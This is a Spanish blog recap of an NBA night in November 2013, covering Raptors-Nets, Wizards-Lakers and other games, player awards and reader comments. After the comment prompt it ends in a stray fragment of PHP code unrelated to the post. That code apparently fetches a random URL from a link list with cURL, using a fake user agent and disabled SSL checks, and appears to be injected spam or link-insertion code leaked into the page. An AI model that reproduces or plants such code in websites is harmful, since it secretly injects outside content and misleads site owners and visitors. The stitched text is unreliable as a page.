La Crónica: ¡Sobreviviré!

27 de November de 2013 por TheDeerHunter

Jornada que esperábamos fría y aburrida, con únicamente 4 partidos y la mayoría de los implicados en zona baja de la clasificación. Terminó siendo apasionante, con choques igualados, remontadas y canastones en el alambre. Hasta 3 de ellos se resolvían con un triple postrero que no entró en ningún caso.

Visitaban Canadá los Nets y nadie daba un duro por ellos. Es cierto que los Raptors no son el equipo más sólido de la zona noble pero sí lo bastante para no llegar a perder por 15 a falta de 5 minutos contra un equipo asfixiado por la ansiedad y las lesiones. 3 pesos pesados como Gay, Amir y Valanciunas parecían ponerse de acuerdo en sus pésimas actuaciones (ahora entendemos la prohibición de la hoja de estadísticas, Rudy) pero los Nets decidían que había que darle emoción al asunto firmando unos 3 minutos finales absolutamente catastróficos. Lo mejor de todo fue cuando dos abajo a falta de 10 segundos los Raptors preparan una jugada de triple… para Amir Johnson. Es de ser inút… (102-100).

En el Verizon Center de Washington asistimos a un bonito duelo en el que las defensas decidieron mirar hacia otro lado. Gran noche para el run&gun de los Lakers, con un dinámico juego de pase, gran acierto en el tiro (13 de 28 en triple) y el banquillo más anotador de la liga. Los Wizards, con Nene, Wall y Webster destacados, lograron administrar mejor sus posesiones y rentas, aprovechar la inexistente defensa rival y llevar a Wall continuamente a la línea de tiros libres. Al final, los Lakers aún tuvieron en su mano forzar una prórroga con una jugada (mal preparada) para Nick Young pero la fortuna no acompañó (111-116). Tampoco hubiera sido justo. Los locales se meten en zona de playoffs y los Lakers se quedan a las puertas esperando la próxima vuelta de Kobe. 

Más cerca estuvieron de lograr la machada los Pelicans. Se salió literalmente de dentro el triple de Eric Gordon. Antes los Warriors habían controlado bien la primera parte aún en ausencia de Bogut por su pelea con Mo Will el otro día. Jermaine lo sustituyó de forma impecable y fue clave en la construcción de las primeras ventajas. Los Pelicans apretaron en la segunda parte, donde Klay Thompson (y la diosa Fortuna) mantuvo a flote a los suyos para aguantar una victoria que empezaba a ser urgente (102-101).

Finalmente la sorpresa saltó en Atlanta y Orlando se llevó la victoria más sobrada de la noche. Muy bien la tríada Afflalo, Oladipo y Nicholson, además de darles un buen repaso bajo tableros a un equipo con un juego interior tan sólido como el de los locales (109-92).

PREMIOS

MVP: Vaya racha lleva John Wall. Tercer partido consecutivo por encima de los 30 puntos. Ayer anotó 31 que adornó con 6 rebotes y 9 asistencias. Su compañero Nene, con 30 puntos, fue su pareja perfecta y ambos fueron claves en los minutos finales del partido.

Rookie: Muy buen partido de Victor Oladipo, tal vez el mejor de la temporada. 18 puntos y 5 asistencias con una sola pérdida. Mason Plumlee, el rookie de los Nets, anotó 9 puntos.

Sorpresa: Jordan Farmar fue el mejor de los Lakers con 22 puntos (9 de 11 en tiro) y 8 asistencias. Jermaine O’Neal salió de titular ante la baja de Andrew Bogut y cumplió con nota con sus 18 puntos y 8 rebotes.

Decepción: Cierto que anotó un triple crucial a falta de 27 segundos que dejaba la victoria a tiro pero el partido de Rudy Gay en general fue infame. 9 puntos con un 3 de 12 y 7 pérdidas. Kyle Korver se quedó en 3 puntos al anotar sólo 1 de los 6 triples que intentó. Al menos continúa su racha de partidos anotando al menos un triple. Lleva 88 a sólo uno de igualar el récord de Dana Barros.

Esfuerzo en vano: 27 puntos anotó Demar DeRozan ante los Nets. Pau Gasol consiguió 17 puntos, 6 rebotes y 8 asistencias con canastas muy meritorias en los minutos calientes pero tampoco pudo llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Simon dice:
    #1

    A ver como les va a los Lakers con Kobe… ahora mismo con ese juego rápido y desenfadado en el que todos tiran y juegan con soltura no se si se seguirá llevando a cabo una vez vuelva Kobe… creo que la sola presencia de Kobe hará que los Young, Henry, Meeks, Farmar se cortarán a la hora de lanzar y no se si eso será positivo para el balance del equipo.

      Citar

  2. Josgel dice:
    #2

    A ver si acaba pronto el record de Korver. Este tipo de marcas, suelen acabar influyendo mal en el juego del jugador y del equipo.

      Citar

  3. Denise dice:
    #3

    Que jugadorazo es Blatche. Con la cabeza centrada llevaría ya algunos All-Stars a sus espaldas y sería uno de los mejores PF’s de la liga.

    Sigo pensando que los Warriors son el mejor equipo de la competición junto con Indiana pero aun mas profundos, pero me están decepcionando. Aun no le han ganado a ningun equipo de entidad y algunos partidos que han ganado ante rivales muy inferiores a ellos se han decidido por escaso margen ó solo han podido romper el partido en los minutos finales. Lo raro, es que no se cual puede ser la causa, porque en terminos individuales, ningun jugador creo que lo esté haciendo mal.

    Tobias Harris jugó ante los Suns su primer partido pero ayer no jugó. La razón fue que volvió a tener dolores en los tobillos, y tras cuajar una pesima aunque comprensiva actuación ante Phoenix, ha decicido no infiltrarse mas y no va a volver a jugar hasta que no esté completamente recuperado. Dice que no quiere que la gente lo vea al nivel con el que jugó ante los Suns.

      Citar

  4. Jose Luis dice:
    #4

    A mi los Warriors ni fú ni fa, mucho tirador de rachas pero ya está. Defensa poquita, y tipos de fajarse en PO solo David Lee y si acaso…

      Citar

  5. Simon dice:
    #5

    Jose Luis:
    A mi los Warriors ni fú ni fa, mucho tirador de rachas pero ya está. Defensa poquita, y tipos de fajarse en PO solo David Lee y si acaso…

    Hombre los Play Off del año pasado no están de acuerdo con eso jejejeje
    Cuando haya que pegarse Barnes, Iguodala, Bogut, Lee… se pegaran con quien haga falta sin ninguna duda… Y Curry es tan bueno que no necesita pegarse con nadie jejeje
    La verdad es que dan sensación de eso que tu dices pero el año pasado demostraron que si son capaces de fajarse.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>